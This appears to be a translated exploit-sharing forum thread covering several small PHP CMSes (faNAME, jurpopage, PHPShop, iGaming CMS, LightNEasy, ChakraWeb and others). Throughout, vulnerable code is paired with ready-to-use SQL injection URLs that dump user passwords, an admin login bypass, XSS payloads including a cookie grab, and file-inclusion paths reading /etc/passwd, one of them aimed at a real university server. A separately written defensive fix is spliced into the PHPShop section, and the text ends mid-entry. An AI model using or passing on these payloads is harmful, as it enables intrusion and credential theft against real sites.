faNAME
product : en.faname

SQL injection
1. mq = off
page.php - the vulnerability is in the code of /class/page.php, which that file calls.
PHP:
$id = $_GET['id'];
$kind = "id";
$result = mysql_query("SELECT * FROM blog WHERE $kind LIKE '$id' order by id DESC LIMIT 1");
while($r=mysql_fetch_array($result))
result :
Code:
http://localhost/en.faname/page.php?id=2'+and+0+union+all+select+1,version(),3,4--+

Blind sql
2. admin panel
/admin/del.page.php
PHP:
if($_GET["cmd"]=="delete") {
    $id = $_GET['id'];
    $sql = "DELETE FROM blog WHERE id=$id";
    $result = mysql_query($sql);
result :
Code:
http://localhost/en.faname/admin/del.page.php?cmd=delete&id={blind sql}

Passive XSS
mq = off
Code:
http://localhost/en.faname/index.php'%22/%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E
Драконий Движок ("Dragon Engine")
product : Драконий Движок 0.1

RFI - LFI
mq=off (admin panel access is not needed)
admin/system/include.php -
PHP:
include("$skindir/header.php");
....
include("$skindir/footer.php");
result :
Code:
http://localhost/admin/system/include.php?skindir=../../[FILE]%00
Code:
http://localhost/admin/system/include.php?skindir=http://localhost/1.txt?

SQL Injection
standard prefix : dre_
mq = off
index.php - calls the file admin/system/engine.php :
PHP:
if ($p != "") $build .= " AND aid = '$p'";
if ($cat || $user) {
    if (!$p) {
        if ($cat) {$build .= " AND category = '$cat'";}
        if ($user) {$build .= " AND username = '$user'";}
result :
Code:
http://localhost/index.php?cat=1'+and+0+union+all+select+1,2,concat_ws(0x3a,uid,username,password),4,5,6,7,8,9,10,11+from+dre_users--+
Code:
http://localhost/index.php?user=1'+and+0+union+all+select+1,2,concat_ws(0x3a,uid,username,password),4,5,6,7,8,9,10,11+from+dre_users--+
Code:
http://localhost/index.php?p=2'+and+0+union+all+select+1,2,concat_ws(0x3a,uid,username,password),4,5,6,7,8,9,10,11+from+dre_users--+

Admin panel
mq=off
admin/profile.php :
PHP:
$result = mysql_query("SELECT * FROM ".$prefix."profile WHERE username = '$username'");
result :
Code:
http://localhost/admin/profile.php?action=view&username=admin'+and+0+union+all+select+concat_ws(0x3a,uid,username,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+dre_users--+

admin/categories.php -
PHP:
$result = mysql_query("SELECT * FROM ".$prefix."categories WHERE cid='$cid'");
result :
Code:
http://localhost/admin/categories.php?action=edit&cid=1'+and+0+union+all+select+1,concat_ws(0x3a,uid,username,password)+from+dre_users--+

And finally, commenting - add this to the comment text (for MySQL 5.0. ...)
Code:
'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1

Passive XSS
Code:
http://localhost/index.php/%22%3E%3Cscript%3Ealert();%3C/script%3E
jurpopage
product : jurpopage-0.0.6
admin panel : /jurpopageadmin

SQL injection
mq=off
index.php
PHP:
$query = "SELECT category_id AS category FROM category WHERE page_id='$page_id' ORDER BY category_id ASC LIMIT 0,1";
$result = fn_query($conn_id,$query);
while($rows = fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE);
}
$active_category_id = $category;
$query = "SELECT category_title AS active_category_title FROM category WHERE page_id='$page_id' AND category_id = '$active_category_id'";
$result = fn_query($conn_id,$query);
while($rows = fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE);
if(isset($HTTP_GET_VARS["id"]))
    $q_note_detail ="page_id = '$page_id' AND note_id = '$id'";
else
    $q_note_detail ="page_id = '$page_id' AND category_id = '$active_category_id' ORDER BY note_id DESC LIMIT 0,1";
...
$q_page ="WHERE page_id = '$page_id' AND category_id = '$active_category_id' ";
result :
Code:
http://localhost/index.php?page_id=[sql]
Code:
http://localhost/index.php?page_id=1&category=[sql]
Code:
http://localhost/index.php?page_id=1&category=100&id=49'+union+all+select+1,2,concat_ws(0x3a,user_name,user_password),4+from+master_user+limit+1,1--+

jurpopageadmin/note.php
mq=off
requires admin panel access
PHP:
$query = "SELECT category_title FROM category WHERE page_id = '".$page_id."' AND category_id = '$category_id'";
Code:
http://localhost/jurpopageadmin/note.php?page_id=[sql]&category=[sql]

Passive XSS
mq=off
Code:
http://localhost/index.php'%22/%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E
PHPShop CMS Free v.3.1
http://www.phpshopcms.ru/

Active XSS
PHP:
// Write a review into the database
function WriteGbook() {
    global $LoadItems,$SysValue,$REMOTE_ADDR,$SERVER_NAME;

    // Load the mail-sending library
    PHPShopObj::loadClass("mail");

    if(isset($_POST['send_gb'])) {
        if(!preg_match("/@/",$_POST['mail_new']))//email check
        {
            $_POST['mail_new']="";
        }
        if(@$_POST['name_new']!="" and @$_POST['otsiv_new']!="" and @$_POST['tema_new']!="") {
            $name_new=PHPShopSecurity::TotalClean($_POST['name_new'],2);
            $otsiv_new=PHPShopSecurity::TotalClean($_POST['otsiv_new'],2);
            $tema_new=PHPShopSecurity::TotalClean($_POST['tema_new'],2);
            $mail_new=addslashes($_POST['mail_new']);
            $date = date("d.m.y");
            $ip=$REMOTE_ADDR;
            $sql="INSERT INTO ".$SysValue['base']['table_name7']." VALUES ('','$date','$name_new','$mail_new','$tema_new','$otsiv_new','','0')";
            mysql_query($sql)or @die($sql."Невозможно добавить к базе");
            $zag=$LoadItems['System']['name']." - Уведомление о добалении отзыва / ".date("d-m-y");
            $message="
Доброго времени!
---------------
С сайта ".$LoadItems['System']['name']." пришло уведомление о добалении отзыва в гостевую книгу.

Данные о пользователе:
----------------------
Имя: ".@$name_new."
E-mail: ".@$mail_new."
Тема сообщения: ".@$tema_new."
Сообщение: ".@$otsiv_new."
Дата: ".date("d-m-y H:s a")."
IP: ".$REMOTE_ADDR."
---------------
С уважением,
Компания ".$LoadItems['System']['company']."
http://".$SERVER_NAME;
            $PHPShopMail = new PHPShopMail($LoadItems['System']['adminmail2'],$mail_new,$zag,$message);
        }
    }
}

Code:
The email is only checked for an "@":
if(!preg_match("/@/",$_POST['mail_new'])){ }

http://localhost/phpshop/gbook_forma/
POST: mail_new
mail_new = "><script>alert(1)</script>@<"

I decoded index.php, if anyone is interested
PHP:
<?
session_start();
error_reporting(0);
if (file_exists("./cnstats/index.php")) include ("./cnstats/cnt.php");

function ParseTemplate($TemplateName) {
    global $SysValue, $_SESSION, $PHP_SELF, $_ENV;
    $file = newGetFile($SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] . chr(47) . $TemplateName);
    $string = newParser($file);
    $path_parts = pathinfo($PHP_SELF);
    if (getenv("COMSPEC")) $dirSlesh = "\\";
    else $dirSlesh = "/";
    $root = $path_parts['dirname'] . "/";
    if ($path_parts['dirname'] != $dirSlesh) {
        $replaces = array(
            "/images\//i" => $SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] . "/images/",
            "/\/favicon.ico/i" => $root . "favicon.ico",
            "/java\//i" => $root . "java/",
            "/css\//i" => $root . "css/",
            "/phpshop\//i" => $root . "phpshop/",
            "/\/links\//i" => $root . "links/",
            "/\/files\//i" => $root . "files/",
            "/\/opros\//i" => $root . "opros/",
            "/\/page\//i" => $root . "page/",
            "/\/news\//i" => $root . "news/",
            "/\/gbook\//i" => $root . "gbook/",
            "/\/search\//i" => $root . "search/",
            "/\"\/\"/i" => $root,
            "/\/map\//i" => $root . "map/",
            "/\/rss\//i" => $root . "rss/",
        );
    } else {
        $replaces = array(
            "/images\//i" => $SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] . "/images/",
            "/java\//i" => "/java/",
            "/css\//i" => "/css/",
            "/phpshop\//i" => "/phpshop/",
        );
    }
    $string = preg_replace(array_keys($replaces), array_values($replaces), $string);
    echo $string;
}

function ParseTemplateReturn($TemplateName) {
    global $SysValue, $LoadItems, $_SESSION;
    $SysValue = $GLOBALS['SysValue'];
    $file = newGetFile($SysValue['dir']['templates'] . chr(47) . $_SESSION['skin'] . chr(47) . $TemplateName);
    $dis = newParser($file);
    return @$dis;
}

function ConstantS($string) {
    return @preg_replace_callback("/@([[:alnum:]]+)@/", "ConstantR", $string);
}

function allowedFunctions($str) {
    $allowFunctions = array('if', 'else', 'swicth', 'for', 'foreach', 'phpinfo', 'echo', 'print', 'print_r');
    $allowFunctions = array_merge($allowFunctions, explode(',', $GLOBALS['SysValue']['function']['allowed']));
    preg_match_all('/\s*([A-Za-z0-9_]+)\s*\(/isU', $str, $findedFunctions);
    $remElements = array_diff($findedFunctions[1], $allowFunctions);
    if (count($remElements) > 0) {
        echo ('<br><br><b>В шаблоне обнаружена запрещенная функция</b><br>');
        echo ('Список найденных запрещенных функций:');
        echo ('<pre>');
        foreach ($remElements as $remElement) {
            echo ($remElement . '()<br>');
        }
        echo ('</pre><br>');
        echo ('Список разрешенных функций (добавить свою функцию можно в config.ini):');
        echo ('<pre>');
        foreach ($allowFunctions as $allowFunction) {
            echo ($allowFunction . '()<br>');
        }
        echo ('<br>');
        echo ('</pre><br>');
        return false;
    } else {
        return true;
    }
}

function evalstr($str) {
    ob_start();
    if (eval(stripslashes($str[2])) !== null) {
        echo ('<center style="color:red"><br><br><b>PHPShop Template Code: В шаблоне обнаружена ошибка выполнения php</b><br>');
        echo ('Код содержащий ошибки:');
        echo ('<pre>');
        echo ($str[2]);
        echo ('</pre></center>');
        return ob_get_clean();
    }
    return ob_get_clean();
}

function newParser($string) {
    global $SysValue;
    $newstring = @preg_replace_callback("/(@php)(.*)(php@)/sU", "evalstr", $string);
    $newstring = @preg_replace("/@([[:alnum:]]+)@/e", '$SysValue["other"]["\1"]', $newstring);
    return $newstring;
}

function ConstantR($array) {
    global $SysValue;
    if (!empty($SysValue['other'][$array[1]])) $string = $SysValue['other'][$array[1]];
    else $string = null;
    return $string;
}

function newGetFile($path) {
    $file = @file_get_contents($path);
    if (!$file) return false;
    return $file;
}

$time = explode(' ', microtime());
$start_time = $time[1] + $time[0];
include ("./phpshop/class/base.class.php");
$PHPShopBase = new PHPShopBase("./phpshop/inc/config.ini");
$RegTo['RegisteredTo'] = "PHPShop CMS Free";
$RegTo['CopyrightEnabled'] = "Yes";
$RegTo['DomenLocked'] = "No";
$RegTo['CopyrightColor'] = "6A7EA1";
$RegTo['SupportExpires'] = "0";
include ($SysValue['file']['error']);
if (empty($GLOBALS['p'])) $GLOBALS['p'] = 1;
if ($SysValue['my']['gzip'] == "true") include ($SysValue['file']['gzip']);
include ($SysValue['class']['obj']);
include ($SysValue['class']['array']);
include ($SysValue['class']['category']);
include ($SysValue['class']['system']);
include ($SysValue['class']['page']);
include ($SysValue['class']['photo']);
include ($SysValue['class']['nav']);
include ($SysValue['class']['security']);
$PHPShopSystem = new PHPShopSystem();
$LoadItems['System'] = $PHPShopSystem->getArray();
$PHPShopNav = new PHPShopNav();
include ($SysValue['file']['engine']);
include ($SysValue['file']['catalog']);
include ($SysValue['file']['news']);
include ($SysValue['file']['subnews']);
include ($SysValue['file']['baner']);
include ($SysValue['file']['cache']);
include ($SysValue['file']['opros']);
if ($LoadItems['System']['spec_num'] == 1) {
    if (isset($_REQUEST['skin'])) {
        if (file_exists("phpshop/templates/" . $_REQUEST['skin'] . "/index.html")) {
            $skin = $_REQUEST['skin'];
            session_register('skin');
        }
    } elseif (empty($_SESSION['skin'])) {
        $skin = $LoadItems['System']['skin'];
        session_register('skin');
    }
    $SysValue['other']['skinSelect'] = Skin_select($_SESSION['skin']);
} else {
    $skin = $LoadItems['System']['skin'];
    session_register('skin');
}
$LoadItems = CacheReturn();
foreach (@$SysValue['autoload'] as $val) if (file_exists($val)) include_once ($val);

function GetFileInstall() {
    global $SysValue;
    $filename = "./install/";
    if (is_dir($filename)) exit(PHPSHOP_error(105, $SysValue['my']['error_tracer']));
}
if (!getenv("COMSPEC")) $GetFileInstall = GetFileInstall();
if ((isset($_GET['nav'])) && ($_GET['nav'] == "page")) {
    $Check_page_skin = Check_page_skin($_GET['name']);
    if ($Check_page_skin != "") {
        $skin = $Check_page_skin;
        session_register('skin');
    } elseif ($LoadItems['System']['spec_num'] != 1) {
        $skin = $LoadItems['System']['skin'];
        session_register('skin');
    }
}
if (isset($_POST['skin'])) header("Location: " . htmlspecialchars($REQUEST_URI));
include ($SysValue['file']['meta']);
$SysValue['other']['ProductName'] = $SysValue['license']['product_name'];
include ($SysValue['file']['autoload']);
$time = explode(' ', microtime());
$seconds = ($time[1] + $time[0] - $start_time);
$seconds = substr($seconds, 0, 6);
echo "<!-- StNF " . $SysValue['sql']['num'] . " ~ $seconds -->";
if ($SysValue['my']['gzip'] == "true") GzDocOut($SysValue['my']['gzip_level'], $SysValue['my']['gzip_debug']);
?>
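Added example, not PHPShop's code: the guestbook above keeps any mail value that merely contains an "@" and later writes it into HTML. The two independent fixes shown are a real address validator on input and HTML encoding on output; the function names and the sample inputs are constructed for the demo.

```php
<?php
// Added example, not PHPShop's code. The guestbook keeps any mail value
// that merely contains "@" and later echoes it into HTML. Two independent
// fixes: validate the address properly on input, and encode on output.

function validate_guestbook_mail(string $raw): string
{
    $mail = trim($raw);
    // Replaces preg_match("/@/", ...): the filter parses the whole address.
    if (strlen($mail) > 254 || filter_var($mail, FILTER_VALIDATE_EMAIL) === false) {
        return '';   // the CMS blanks the field on failure; keep that contract
    }
    return $mail;
}

// Output encoding for an HTML body or attribute; ENT_QUOTES covers the
// attribute-closing quote that the payload in the post starts with.
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: one valid address, the payload from the post, a near miss.
$inputs = [
    'user@example.com',
    '"><script>alert(1)</script>@<',
    'user@example.com<br>',
];
foreach ($inputs as $in) {
    printf("input:    %s\nstored:   [%s]\nrendered: %s\n\n",
        $in, validate_guestbook_mail($in), html($in));
}
```

Only the first input survives validation; the other two are stored as an empty string, and the rendered line shows that even an unvalidated value would reach the page as inert text.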
product : jurpopage-0.0.6
Addition to the posts by [x60]unu...

SQL inj
html.php
mg=off
PHP:
...
if(empty($id)) $id=1;
$web = new speed_template($template_path);
$web->register($template_name);
$query = " SELECT * FROM webpg WHERE webpg_id='$id' ";
...
Result:
http://localhost/jurp/html.php?id=[sql]
http://localhost/jurp/html.php?id=3'+union+select+1,2,3--+

SQL inj
File login.php, POST + captcha
mg=off
There are 2 queries in the script. A multi-line comment would have to be stuffed into the second query to bypass the authorisation, but since there is upper() there, it doesn't work. But the most interesting thing is that it accepts --. Put such a string into the USER ID field and I have an injection in the first query. All 3 fields are required.
PHP:
...$conn_id = connect();
//--- check whether that user name exists
//master user
$query = " SELECT count(*) as user_exist FROM master_user WHERE upper(user_id) = upper('$send_user') ";
$result = fn_query($conn_id,$query);
$mRet =fn_fetch_row($result);
if ($mRet[0]>0) {
    //process
    while($rows = fn_fetch_array($result)) extract($rows,EXTR_OVERWRITE);
    $password = md5($password);
    $query = " SELECT #user_id as temp_value, user_level as temp_level
                      user_id as temp_value, user_level as temp_level, master_user_id as temp_rowid
               FROM master_user WHERE upper(user_id) = upper('$send_user') and user_password = '$password' ";...
DBMS error output is present, file fungsi.php
PHP:
...function fn_query($conn, $input) {
    //$result =pg_query($input,$conn);
    $result =@mysql_query($input,$conn);
    if (!$result) {
        die ("Error eksekusi:<br>".mysql_error());
        return false;
    }
    return $result;...
Addition to the posts by [x60]unu...

iGaming CMS
Product : iGaming CMS
version : 1.5
site : forums.igamingcms.com

SQL inj
File screenshots.php
mg=off
PHP:
...if (isset($_REQUEST[id])) {
    $result = $db->Execute("SELECT * FROM `sp_screenshots` WHERE `id` = '$_REQUEST[id]' LIMIT 1");
    echo $start_table . '<b>',stripslashes($result->fields['title']),'</b>' . $end_table . '<br />';
    echo '<center><img src="',$result->fields['screen'],'" border="0" alt="',stripslashes($result->fields['title']),'"></center>';
}...
Result:
http://localhost/gami/screenshots.php?id=1[sql]
http://localhost/gami/screenshots.php?id=-1'+union+select+1,version(),3,4,5--+

SQL inj
reviews.php
mg=off
PHP:
... if (isset($_REQUEST['browse'])) {
    $sql = $db->Execute("SELECT id,title,section FROM `sp_reviews` WHERE `title` LIKE '".$_REQUEST['browse']."%' ORDER BY `title`");...
Result:
http://localhost/gami/reviews.php?browse=Z[sql]
http://localhost/gami/reviews.php?browse=Z'+union+select+1,2,3/*

SQL inj
search.php
mg=off
PHP:
... if ($_REQUEST['platform'] != 'all') {
    $platform = "`section` = '" . $_REQUEST['platform'] . "' ";
} else {
    $platform = "`section` LIKE '%' ";
}
if ($_REQUEST['exact'] == '1') {
    $title = "`title` = '".$_REQUEST['keywords']."' ";
} else {
    $title = "`title` LIKE '%".$_REQUEST['keywords']."%' ";
}
$result = $db->Execute("SELECT id,title,section,publisher,developer FROM `sp_games` WHERE $title AND $platform AND `published` = '1' ORDER BY `title`");
while ($row = $result->FetchNextObject()) {...
Result:
Send a POST or GET request. $_REQUEST['keywords'][sql], or to another variable... in the Keywords field write -
%' union select 1,version(),3,4,5/*

Blind sql
poll_vote.php
PHP:
$result = $db->Execute("SELECT * FROM sp_polls_options WHERE id = '$_REQUEST[id]'");
$ip = $db->Execute("SELECT * FROM sp_polls_iplog WHERE pollid = '" . $result->fields['poll_id'] . "' AND ip = '" . $_SERVER['REMOTE_ADDR'] . "';") or die($db->ErrorMsg());
if ($ip->RecordCount() < 1) {
    $count2 = $result->fields['count'] + 1;
    $db->Execute("UPDATE `sp_polls_options` SET `count` = $count2 WHERE `id` = '$_REQUEST[id]'");
    $db->Execute("INSERT INTO sp_polls_iplog (pollid,ip) VALUES ('" . $result->fields['poll_id'] . "','" . $_SERVER['REMOTE_ADDR'] . "');");
}
Honestly, I can't even be bothered to dig any further!!! Lots of holes...
Jupiter 1.1.5
http://www.jupiterportal.org

passive xss
downloaded from http://www.cmsdownload.com/index.php?name=Downloads&get=99&mirror=132
PHP:
...error_reporting (E_ALL);
$PHP_SELF = $_SERVER['PHP_SELF'];...
PHP:
...<tr><td class="con1" valign="top"><a href="<?= $PHP_SELF ?>?a=logout"> » <?= $language['Bans desc4'] ?></a></td></tr>...
PHP:
...if(!isset($is_loged_in)) { ?>
<tr class='bottom' height='1%'><td valign='top'><?= $language['Maintance title2'] ?></td></tr>
<tr><td class='con2'><?= messagedef($language['Header message']) ?></td></tr>
<tr><td class='con1' height='96%' valign='top'>
<form method='post' action='<?= $PHP_SELF ?>?n=modules/login'>...
PHP:
...<table width='100%' cellspacing='1' border='0' cellpadding='2'>
<tr><td class='empty' width='35%' valign='top'><a href='<?= $PHP_SELF ?>?n=modules/login&a=1'> » <?= $language['Maintance desc6'] ?></a></td>
<td class='con1' width='5%'> </td>...
PHP:
...if(file_exists("$n.php")) {
    if(strpos($n, "../") !== false) header("location: $PHP_SELF?i=error");
    else include("$n.php");
} elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error");...
Result:
http://localhost/jupiter/index.php[XSS]

passive xss
modules/block.php
PHP:
...if(!isset($is_webmaster)) {
    header("location: $PHP_SELF?i=2");
    exit;
}...
Result:
http://localhost/jupiter/modules/blocks.php[XSS]
http://localhost/jupiter/modules/blocks.php%3Cscript%3Ealert(123)%3C/script%3E
There are many more XSS in the scripts =/
LightNEasy
site: http://www.lightneasy.org/index.php
magic_quotes_gpc = off

Login with admin privileges
The only thing I came up with:
login: "+union+select+1,2,'40bd001563085fc35165329ea1ff5c5ecbdbbeef',5,5,6,7,8,9,10,11+--+
pass: 123
40bd001563085fc35165329ea1ff5c5ecbdbbeef - sha-1("123")
Vulnerable code (common.php):
PHP:
$result=dbquery('SELECT * FROM '.$prefix.'users WHERE handle="'.$_POST['handle'].'"');
if($row = fetch_array($result)) {
    if($row['password'] == sha1($_POST['password'])) {
        //inserts password in cookie
        setcookie('userpass', sha1(trim($_POST['password'])), time() + 60 * 60 * 24 * 30);
        setcookie('userhandle', $_POST['handle'], time() + 60 * 60 * 24 * 30);
        $_SESSION[$set['password']]="1";
        $_SESSION['user']=$row['handle'];
        $_SESSION['adminlevel']=$row['adminlevel'];
        $message=$langmessage[95];
        unset($_GET['do']);
        header("Location: ".$set['homepath']);
    } else $message=$langmessage[96];
} else $message=$langmessage[96];

Active XSS
http://localhost/light/LightNEasy.php?page=news
Code:
commentmessage=<script>alert(document.cookie)</script>
Vulnerable code (common.php)
PHP:
$_POST['commentmessage'] = str_replace($order, "<br />", $_POST['commentmessage']);
$query="INSERT INTO ".$prefix."comments (newsid, poster, postermail, time, text) VALUES (".$_POST['newsid'].",\" ".encode($_POST['commentname'])."\", \"".encode($_POST['commentemail'])."\", ".time().", \"".encode(stripslashes($_POST['commentmessage']))."\")";
dbquery($query);
Addition to https://forum.antichat.ru/showpost.php?p=1991535&postcount=343
---------------------------------------
SQL injection (requirements: mq=off, rq=on)

№1
file: modules/users.php
PHP:
case 1:
....
$user = $db->getLine("SELECT * FROM users",$d);
if(!$user) header("location: $PHP_SELF?i=error");
....
file: includes/functions_db.php
PHP:
function getLine($query,$id=FALSE) {
    if($id===FALSE) $this->query($query);
    else $this->query($query." WHERE `id`='$id'");
    if(is_resource($this->sqlr)) {
        $line=mysql_fetch_assoc($this->sqlr);
        $this->freeResult();
        return $line;
    }
    return FALSE;
}
result:
Code:
/index.php?n=modules/users&a=1&d=-1'+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+where+id=1+--+

№2
file: modules/forum.php
PHP:
case 1:
...
$forum_cat = $db->getLine("SELECT id, name FROM forum_cat",$d);
if(!$forum_cat) header("location: $PHP_SELF?i=error");
...
file: includes/functions_db.php (getLine, same as above)
result:
Code:
/index.php?n=modules/forum&a=1&d=-1'+union+select+1,concat_ws(0x3a,username,password)+from+users+where+id=1+--+

//injections using the buggy getLine function
№3
/index.php?n=modules/forum&a=3&d=1&o=1&q=-1'+union+select+1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+users+where+id=1+--+
№4
/index.php?n=modules/forum&a=5&d=1&o=1&q=1&p=0&k=-1'+union+select+1,concat_ws(0x3a,username,password)+from+users+where+id=1+--+
№5
/index.php?n=modules/pm&a=3&d=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users+where+id=1+--+&s=r_date&t=DESC&p=1
...
Product: Acute Control Panel
Version: 1.1.1
Author: http://acutecp.rediscussed.com/
The author posted it on opensourcecms.org; I stumbled on it and took a look.

SQL-Inj
Need: mq = off
File: acute-cp/login.php
PHP:
$username = strtolower($_POST['username']);
$password = strtolower($_POST['password']);
if (!empty($username) || !empty($password)){
    $query = mysql_query("SELECT id,username,password,email,fullname,permissions FROM `users` WHERE username='$username' AND password='$password'", $conn) or die(mysql_error());
    $row = mysql_fetch_array($query);
    ....
    if(mysql_numrows($query)== 1){
        $_SESSION['username']=$row['username'];
        $_SESSION['email']=$row['email'];
        $_SESSION['fullname']=$row['fullname'];
        $_SESSION['permissions']=$row['permissions'];
Target:
{POST} ?login=-1'+union+select+1,2,3,4,5,6+--+&password=1
or ByPass:
{POST} ?login=-22' or 1=1+--+&password=1

Once the session is set, injections can be made into almost every file. For example, a local include can be done:
File: acute-cp/options.php
PHP:
$so_theme = $_POST['so_theme'];
....
$so_edit_settings = $_POST['Update'];
if(isset($so_edit_settings)){
    $result = mysql_query("UPDATE `settings` SET `website_option`='$so_theme' WHERE website_setting='theme'")or die(mysql_error());
...
File: web_settings.php
PHP:
$result = mysql_query("SELECT `website_option` FROM `settings` WHERE website_setting='theme'",$conn) or die(mysql_error());
$theme_name_result = mysql_fetch_row($result);
$theme_name = $theme_name_result['0'];
//$theme_directory = "themes/".$theme_name; //old code that was exploited
If(strpos($_SERVER['SCRIPT_FILENAME'],"acute-cp")){ //is in sub folder, such as admin
    define("theme_directory","../themes/".$theme_name);
}else{
    define("theme_directory","themes/".$theme_name);
}
File: index.php
PHP:
<?php include_once("web_settings.php"); ?>
<?php include_once(theme_directory."/header.php"); ?>
Target:
{POST} acute-cp/options.php?so_theme=../../../../../../../etc/passwd%00
Enter: http://target/index.php
STACK
System for Teaching and Assessment using a Computer algebra Kernel
The STACK system is a computer aided assessment package for mathematics.

LFI example:
Code:
http://vesna.fmf.uni-lj.si/stack/documentation.php?action=/../../../../../../../etc/passwd%00&expand=13
HOME PAGE:
Code:
http://sourceforge.net/projects/stack/
Vulnerable: Stack 1.1
Product ChakraWeb!
Downloaded from here

SQL inj
mg doesn't matter!
/phpmod/news.php
For an ordinary user:
PHP:
...case 'detail':
    NewsShowDetail();
    break;...
PHP:
...function NewsShowDetail() {
    $news_id = RequestGetValue('id', 0);
    $sql = "select news_title, news_desc, news_content from news where news_id=$news_id";
    $rs = DbExecute($sql);
    if ($rs && !$rs->EOF)...
/_files/library/fun_utils.php
PHP:
... function RequestGetValue($var_name, $default=false, $clean=CLEAN_NO) {
    global $PhpMagicQuote;
    if (isset($_REQUEST[$var_name])) {
        $out = $_REQUEST[$var_name];
        if (is_string($out)) {
            if ($PhpMagicQuote) $out = stripslashes($out);
            $out = trim($out);
        }
        if ($clean == CLEAN_SAVE) $out = HtmlClean($out);
        else if ($clean == CLEAN_ALL) $out = HtmlCleanAll($out);
    } else $out = $default;
    return $out;
}...
Result:
http://chakra/phpmod/news.php?op=detail&id=1[SQL]&cat=3
http://chakra/phpmod/news.php?op=detail&id=-1+union+select+concat_ws%280x3a,m_name,m_password%29,2,3+from+sysmember+limit+1,1--+&cat=3

/files/library/fun_web.php
function InitSystemVars()
PHP:
... $gFolderId = RequestGetValue('cat', 0);
if ($gFolderId == 0)...
function NewsShowPage
PHP:
... $gPageId = 0;
DBGetFolderData($gFolderId);
$gWebPage['page_sidebar'] = RenderPageSidebar()...
/_files/library/fun_web.php
PHP:
...function DBGetFolderData($folder_id) {
    global $gCurrentUrlPath;
    global $gFolder;
    global $db;
    global $gReadLevel, $gWriteLevel;
    if ($folder_id >= 0) {
        $sql = "select folder_lid, folder_id, folder_name, folder_label, folder_title, folder_desc, folder_keywords, folder_robots, folder_sidebar, folder_parent, folder_show, folder_active, folder_order, read_level, write_level, upload_by, upload_on, update_on from web_folder where folder_id=$folder_id and folder_lid=".$db->qstr(UserGetLID());
        $rs = DbExecute($sql);
        if ($rs === false) DbFatalError("DBGetFolderData");
        if (!$rs->EOF) {...
/_files/library/fun_dbutils.php
PHP:
...function DbFatalError($section, $msg='') {
    global $db;
    if (!empty($msg)) $msg .= '. ';
    $msg .= $db->ErrorMsg();
    DbLogWrite($section, '.MSG:', $msg);
    SystemFatalError($section, $msg);
}...
/_files/library/cls_dbase.php
PHP:
... function ErrorMsg() {
    return 'DBError('.@mysql_errno().'): '.@mysql_error();
}...
/_files/library/fun_systems.php
PHP:
...function SystemFatalError($section, $msg) {
    SetDynamicContent();
    $out = '<html><head><title>Fatal System Error</title>';
    $out .= '</head><body>';
    $out .= '<hr noshade size=2>';
    $out .= 'Fatal System Error On <b>'.$section.':</b><br> '.$msg;
    $out .= '<hr noshade size=2>';
    $out .= 'Sorry for this unconvenience. Please report to the webmaster of this homepage.';
    $out .= '</body></html>';
    echo $out;
    die();
}...
Result:
http://chakra/phpmod/news.php?op=detail&id=1&cat=3[SQL]
http://chakra/phpmod/news.php?op=detail&id=1&cat=3+and+%281,2%29=%28select+*+from%28select+name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29--

XSS
/phpmod/search.php
PHP:
... $q = RequestGetValue('q', '');
$p = RequestGetValue('p', 1);
$title = "<h1>"._HPAGE_SEARCH_TITLE."</h1>\n";
$content = "<p>".sprintf(_HPAGE_SEARCH_MESSAGE, $q)."</p>\n";...
Result:
http://chakra/phpmod/search.php?q=[XSS]
http://chakra/phpmod/search.php?q=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E

SQL inj
/phpmod/link.php
$op accepts (ordinary user)
PHP:
...case 'show':
    LinkInitVars();
    LinkFormShow('add', false);
    break;...
The RequestGetValue function is described above!
PHP:
function LinkInitVars() {
    global $gWebPage;
    global $gPageId;
    global $gFolder, $gFolderId;
    $gWebPage['from'] = '';
    $gWebPage['fld_id'] = 0;
    $gWebPage['fld_url'] = '';
    $gWebPage['fld_title'] = '';
    $gWebPage['fld_desc'] = '';
    $gWebPage['fld_note'] = '';
    $gPageId = RequestGetValue('id', 0);
}
PHP:
...function LinkFormShow($op, $dbinit, $errmsg='') {
    global $gFolder, $gFolderId;
    global $gRequestPath, $gCurrentUrlPath, $gRequestFile;
    global $gWebPage;
    global $gHomePageHeader, $gHomePageFooter;
    global $gBaseLocalPath;
    global $gHomePageUrl, $gPageNavigation;
    $from = RequestGetValue('from');
    if (!empty($from)) {
        $gCurrentPageNavigation = '';
        $gPageNavigation = array();
        $gPageNavigation[] = array($gHomePageUrl.$gBaseUrlPath."/index.html", _NAV_FRONTPAGE);
        $gPageNavigation[] = array($gHomePageUrl."/phpmod/cpanel.php", _NAV_CONTROL_PANEL);
        $gPageNavigation[] = array($gHomePageUrl."/phpmod/todo.php", _NAV_TODO_LIST);
        $gPageNavigation[] = array($gHomePageUrl."/phpmod/todo.php?op=link", _NAV_TODO_LINK);
        $gWebPage['from'] = $from;
    } else {
        DBGetFolderData($gFolderId);
        $gRequestPath = FindPathFromFolderId($gFolderId);
        $gCurrentUrlPath = $gBaseUrlPath.$gRequestPath;
        $gRequestFile = 'index.html';
        $gWebPage['from'] = '';
    }
...
Printable field; can't be bothered to look for exactly where it is in the code!
Result:
http://chakra/phpmod/link.php?op=show&cat=4[SQL]
http://chakra/phpmod/link.php?op=show&cat=4+and+0+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,database%28%29,user%28%29,version%28%29%29,10,11,12,13,14,15,16,17,18--+
Product Micro CMS 3.5
download

